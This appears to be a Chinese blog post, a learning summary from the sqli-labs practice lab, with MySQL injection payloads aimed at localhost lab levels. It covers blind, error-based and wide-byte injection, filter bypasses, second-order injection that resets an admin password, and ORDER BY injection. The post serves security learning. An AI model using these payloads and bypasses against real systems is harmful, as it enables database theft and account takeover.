<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Web安全," />










<meta name="description" content="0x00从sqli-lab入门Mysql注入。总结记录下我学到的知识点。 0x01 注入步骤 查看当前的用户名，数据库和版本号。user(),datebase(),version() 从information_schema中获取数据库、数据表的信息。 拖库或传Shell  0x02 盲注技巧BoolenBased当参数传递正确或错误时页面的返回结果不同时，可以用这种方法。速度比TimeBased快">
<meta name="keywords" content="Web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-lab学习心得总结">
<meta property="og:url" content="https://yyhylh.github.io/2017/12/10/sqli-lab学习的一些思路/index.html">
<meta property="og:site_name" content="LLLH">
<meta property="og:description" content="0x00从sqli-lab入门Mysql注入。总结记录下我学到的知识点。 0x01 注入步骤 查看当前的用户名，数据库和版本号。user(),datebase(),version() 从information_schema中获取数据库、数据表的信息。 拖库或传Shell  0x02 盲注技巧BoolenBased当参数传递正确或错误时页面的返回结果不同时，可以用这种方法。速度比TimeBased快">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://yyhylh.github.io/img/sql/err.png">
<meta property="og:image" content="https://yyhylh.github.io/img/sql/err1.png">
<meta property="og:image" content="https://yyhylh.github.io/img/sql/err2.png">
<meta property="og:image" content="https://yyhylh.github.io/img/sql/two.png">
<meta property="og:image" content="https://yyhylh.github.io/img/sql/user1.png">
<meta property="og:image" content="https://yyhylh.github.io/img/sql/user2.png">
<meta property="og:image" content="https://yyhylh.github.io/img/sql/order1.png">
<meta property="og:updated_time" content="2017-12-10T09:18:34.060Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="sqli-lab学习心得总结">
<meta name="twitter:description" content="0x00从sqli-lab入门Mysql注入。总结记录下我学到的知识点。 0x01 注入步骤 查看当前的用户名，数据库和版本号。user(),datebase(),version() 从information_schema中获取数据库、数据表的信息。 拖库或传Shell  0x02 盲注技巧BoolenBased当参数传递正确或错误时页面的返回结果不同时，可以用这种方法。速度比TimeBased快">
<meta name="twitter:image" content="https://yyhylh.github.io/img/sql/err.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://yyhylh.github.io/2017/12/10/sqli-lab学习的一些思路/"/>





  <title>sqli-lab学习心得总结 | LLLH</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  
  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">LLLH</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">恰逢适会</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://yyhylh.github.io/2017/12/10/sqli-lab学习的一些思路/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="LH">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="LLLH">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sqli-lab学习心得总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-12-10T23:07:49+08:00">
                2017-12-10
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x00"><a href="#0x00" class="headerlink" title="0x00"></a>0x00</h2><p>从sqli-lab入门Mysql注入。总结记录下我学到的知识点。</p>
<h2 id="0x01-注入步骤"><a href="#0x01-注入步骤" class="headerlink" title="0x01 注入步骤"></a>0x01 注入步骤</h2><ul>
<li>查看当前的用户名，数据库和版本号。user(),datebase(),version()</li>
<li>从<code>information_schema</code>中获取数据库、数据表的信息。</li>
<li>拖库或传Shell</li>
</ul>
<h2 id="0x02-盲注技巧"><a href="#0x02-盲注技巧" class="headerlink" title="0x02 盲注技巧"></a>0x02 盲注技巧</h2><h3 id="BoolenBased"><a href="#BoolenBased" class="headerlink" title="BoolenBased"></a>BoolenBased</h3><p><em>当参数传递正确或错误时页面的返回结果不同时，可以用这种方法。速度比TimeBased快很多。</em></p>
<p>payload:<code>ascii(substr((select database()),1,1))&gt;64</code></p>
<p><code>if(a,b,c)</code>：a为条件，a为true，返回b，否则返回c，如if(1&gt;2,1,0),返回0。<code>substr()</code>截取字符串，第一个参数截取字符串，第二个参数是起始位置，第三个参数是截取长度。每次查询一位，根据返回的结果判断查询条件，利用二分法查询。</p>
<p><code>substr(str,pos,len)</code>：str从pos位置开始截取len长度的字符进行返回.。注意这里的pos位置是从1开始的，不是数组的0开始</p>
<h3 id="TimeBased"><a href="#TimeBased" class="headerlink" title="TimeBased"></a>TimeBased</h3><p><em>当参数传递正确或错误时页面的返回结果相同时，可以用这种方法。速度比TimeBased快很多。</em></p>
<p>payload:<code>SLEEP(time)</code>、<code>BENCHMARK(count, expr)</code></p>
<p><code>SLEEP(time)</code>使程序等待time秒，<code>BENCHMARK（count,expr）</code>执行expr指令count次。这两个函数可以用来结合if()、ascii()、substr()等函数可以构造时间注入。</p>
<h2 id="0x03-双查询"><a href="#0x03-双查询" class="headerlink" title="0x03 双查询"></a>0x03 双查询</h2><p><em>适用于基于报错的某些情况下,联合查询不会直接回显查询结果时，我们可以利用双查询，把想要的信息通过报错返回。 //如Less-6</em></p>
<h5 id="双查询使用的四个函数"><a href="#双查询使用的四个函数" class="headerlink" title="双查询使用的四个函数"></a>双查询使用的四个函数</h5><ul>
<li>Rand() //随机函数</li>
<li>Floor() //取整函数</li>
<li>Count() //汇总函数</li>
<li>Group by clause //分组函数</li>
</ul>
<p>payload:<code>select count(\*), concat((select version()), floor(rand()*2))as a from information_schema.tables group by a;</code></p>
<p>当在一个聚合函数，比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。</p>
<p>以Less-6举例</p>
<p>源码：</p>
<p><img src="/img/sql/err.png"></p>
<p>payload:</p>
<blockquote>
<p><a href="http://localhost/Less-6/?id=0%22%20union%20select%201,count(\*),%20concat(%27~%27,(select%20user()),%27~%27,%20floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+" target="_blank" rel="external">http://localhost/Less-6/?id=0%22%20union%20select%201,count(\*),%20concat(%27~%27,(select%20user()),%27~%27,%20floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+</a></p>
</blockquote>
<p>result：</p>
<p><img src="/img/sql/err1.png"></p>
<p>在payload加入<code>concat()</code>是为了便于区分，同时避免有些时候返回结果显示不完全的情况。</p>
<h2 id="0x04-其他基于报错的注入函数"><a href="#0x04-其他基于报错的注入函数" class="headerlink" title="0x04 其他基于报错的注入函数"></a>0x04 其他基于报错的注入函数</h2><p><em>适用情况跟双查询相同</em></p>
<p>payload:<code>updatexml()</code>/<code>extractvalue()</code></p>
<p><code>UPDATEXML (XML_document, XPath_string, new_value);</code></p>
<ul>
<li>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc </li>
<li>第二个参数：XPath_string (Xpath格式的字符串) </li>
<li>第三个参数：new_value，String格式，替换查找到的符合条件的数据</li>
<li>作用：改变文档中符合条件的节点的值</li>
</ul>
<p><code>extractvalue()</code>和前者类似。</p>
<p>同以Less-6举例</p>
<p>payload：</p>
<blockquote>
<p><a href="http://localhost/Less-6/?id=0%22%20or%20updatexml(1,concat(%22:%22,version(),1),1)%20--+" target="_blank" rel="external">http://localhost/Less-6/?id=0%22%20or%20updatexml(1,concat(%22:%22,version(),1),1)%20--+</a></p>
</blockquote>
<p>result：</p>
<p><img src="/img/sql/err2.png"></p>
<h2 id="0x05-绕过技巧"><a href="#0x05-绕过技巧" class="headerlink" title="0x05 绕过技巧"></a>0x05 绕过技巧</h2><h3 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h3><p><em>对于那些使用gbk编码的页面，当源码对输入进行加斜杆的转义时,可以使用宽字节注入绕过。</em></p>
<p>以Less-33举例：</p>
<p>参数被addslashes函数转义。</p>
<p>payload:</p>
<blockquote>
<p><a href="http://localhost/Less-32/?id=0%df%27%20union%20select%201,2,3%20--+" target="_blank" rel="external">http://localhost/Less-32/?id=0%df%27%20union%20select%201,2,3%20--+</a></p>
</blockquote>
<p>由于mysql的特性，因为gbk是多字节编码，他认为两个字节代表一个汉字，所以%df和后面的\也就是%5c变成了一个汉字“運”，而’逃逸了出来。</p>
<h3 id="or-and-绕过"><a href="#or-and-绕过" class="headerlink" title="or/and 绕过"></a>or/and 绕过</h3><ul>
<li><code>||</code>=or,<code>&amp;&amp;</code>=and</li>
<li>双写绕过，如oorr\aandnd</li>
</ul>
<h3 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h3><ul>
<li>/**/绕过</li>
<li>%a0绕过 </li>
</ul>
<p>%a0绕过原理：在进行正则匹配时，匹配到它时是识别为中文字符的，所以不会被过滤掉，但是在进入SQL语句后，Mysql是不认中文字符的，所以直接当作空格处理，就这样，我们便达成了Bypass的目的，成功绕过空格+注释的过滤    </p>
<h3 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h3><p><em>利用源码的逻辑错误注入</em></p>
<p>以Less-24举例</p>
<p>源码：</p>
<p><img src="/img/sql/two.png"></p>
<p>一个登录系统，在注册、登陆等环节都使用了<code>mysql_real_escape_string</code>函数转义，但是在如图所示的更改密码时没有检测username,我们可以利用这个逻辑错误修改一些可能存在的常见用户名（如admin、root）的密码。</p>
<p>以修改admin用户密码举例，注册一个用户</p>
<blockquote>
<p>username：admin’ –+</p>
<p>password: 123</p>
</blockquote>
<p>它在php里会被转义，但是存进数据库时还是原始值</p>
<p><img src="/img/sql/user1.png"> </p>
<p>然后修改密码</p>
<p><img src="/img/sql/user2.png"></p>
<h2 id="0x06-ORDERBY从句注入技巧"><a href="#0x06-ORDERBY从句注入技巧" class="headerlink" title="0x06 ORDERBY从句注入技巧"></a>0x06 ORDERBY从句注入技巧</h2><p>orderby注入有独特的判断方法。注入的思路和之前区别不大，但是一些函数使用上有些区别。</p>
<p>以Less-46举例</p>
<p>源码：</p>
<p><img src="/img/sql/order1.png"></p>
<h3 id="简单判断"><a href="#简单判断" class="headerlink" title="简单判断"></a>简单判断</h3><p>paylaod:</p>
<blockquote>
<p><a href="http://localhost/Less-46/?sort=1%27%20or%201=1%20--+" target="_blank" rel="external">http://localhost/Less-46/?sort=1%27%20or%201=1%20--+</a></p>
<p><a href="http://localhost/Less-46/?sort=1%20%20or%201=1%20--+" target="_blank" rel="external">http://localhost/Less-46/?sort=1%20%20or%201=1%20--+</a></p>
<p><a href="http://localhost/Less-46/?sort=1%20%20desc" target="_blank" rel="external">http://localhost/Less-46/?sort=1%20%20desc</a></p>
</blockquote>
<p><code>desc</code>/<code>asc</code>观察回显的顺序，判断是否有orderby从句的注入点</p>
<h3 id="基于报错"><a href="#基于报错" class="headerlink" title="基于报错"></a>基于报错</h3><p>payload:</p>
<blockquote>
<p><a href="http://localhost/Less-46/?sort=1%20or%20%20updatexml(1,concat(0x2829,version()),1)%20--+" target="_blank" rel="external">http://localhost/Less-46/?sort=1%20or%20%20updatexml(1,concat(0x2829,version()),1)%20--+</a></p>
</blockquote>
<h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h3><h4 id="BoolenBased-1"><a href="#BoolenBased-1" class="headerlink" title="BoolenBased"></a>BoolenBased</h4><blockquote>
<p><a href="http://localhost/Less-46/?sort=(select+1+regexp+if(substring(database(),1,1)=0x73,1,0x00" target="_blank" rel="external">http://localhost/Less-46/?sort=(select+1+regexp+if(substring(database(),1,1)=0x73,1,0x00</a>))</p>
</blockquote>
<p><code>regexp</code>正则匹配函数</p>
<p>1与if语句正则匹配，database()第一个字符=0x73为真则if为1，则regexp匹配结果为1，否则为0。</p>
<h4 id="TimeBased-1"><a href="#TimeBased-1" class="headerlink" title="TimeBased"></a>TimeBased</h4><blockquote>
<p><a href="http://localhost/Less-46/?sort=if(len(select" target="_blank" rel="external">http://localhost/Less-46/?sort=if(len(select</a> version())&gt;5,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))</p>
</blockquote>
<h2 id="Refer"><a href="#Refer" class="headerlink" title="Refer:"></a>Refer:</h2><ul>
<li><a href="https://www.2cto.com/article/201303/192718.html" target="_blank" rel="external">双查询</a></li>
<li><a href="https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html" target="_blank" rel="external">宽字节注入</a>//膜p神</li>
<li><a href="https://www.secpulse.com/archives/57197.html" target="_blank" rel="external">orderby从句注入</a></li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web安全/" rel="tag"># Web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/12/09/sql/" rel="next" title="sqli-lab:Less29-53记录">
                <i class="fa fa-chevron-left"></i> sqli-lab:Less29-53记录
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/11/22/Root-me-Web-server/" rel="prev" title="Root-me Web-server">
                Root-me Web-server <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.png"
                alt="LH" />
            
              <p class="site-author-name" itemprop="name">LH</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00"><span class="nav-number">1.</span> <span class="nav-text">0x00</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-注入步骤"><span class="nav-number">2.</span> <span class="nav-text">0x01 注入步骤</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-盲注技巧"><span class="nav-number">3.</span> <span class="nav-text">0x02 盲注技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#BoolenBased"><span class="nav-number">3.1.</span> <span class="nav-text">BoolenBased</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#TimeBased"><span class="nav-number">3.2.</span> <span class="nav-text">TimeBased</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-双查询"><span class="nav-number">4.</span> <span class="nav-text">0x03 双查询</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#双查询使用的四个函数"><span class="nav-number">4.0.0.1.</span> <span class="nav-text">双查询使用的四个函数</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-其他基于报错的注入函数"><span class="nav-number">5.</span> <span class="nav-text">0x04 其他基于报错的注入函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-绕过技巧"><span class="nav-number">6.</span> <span class="nav-text">0x05 绕过技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#宽字节注入"><span class="nav-number">6.1.</span> <span class="nav-text">宽字节注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#or-and-绕过"><span class="nav-number">6.2.</span> <span class="nav-text">or/and 绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#空格绕过"><span class="nav-number">6.3.</span> <span class="nav-text">空格绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二次注入"><span class="nav-number">6.4.</span> <span class="nav-text">二次注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x06-ORDERBY从句注入技巧"><span class="nav-number">7.</span> <span class="nav-text">0x06 ORDERBY从句注入技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#简单判断"><span class="nav-number">7.1.</span> <span class="nav-text">简单判断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于报错"><span class="nav-number">7.2.</span> <span class="nav-text">基于报错</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#盲注"><span class="nav-number">7.3.</span> <span class="nav-text">盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#BoolenBased-1"><span class="nav-number">7.3.1.</span> <span class="nav-text">BoolenBased</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#TimeBased-1"><span class="nav-number">7.3.2.</span> <span class="nav-text">TimeBased</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Refer"><span class="nav-number">8.</span> <span class="nav-text">Refer:</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">LH</span>

  
</div>






        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.3"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  
  

  

  

  


<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

  </body>
</html>
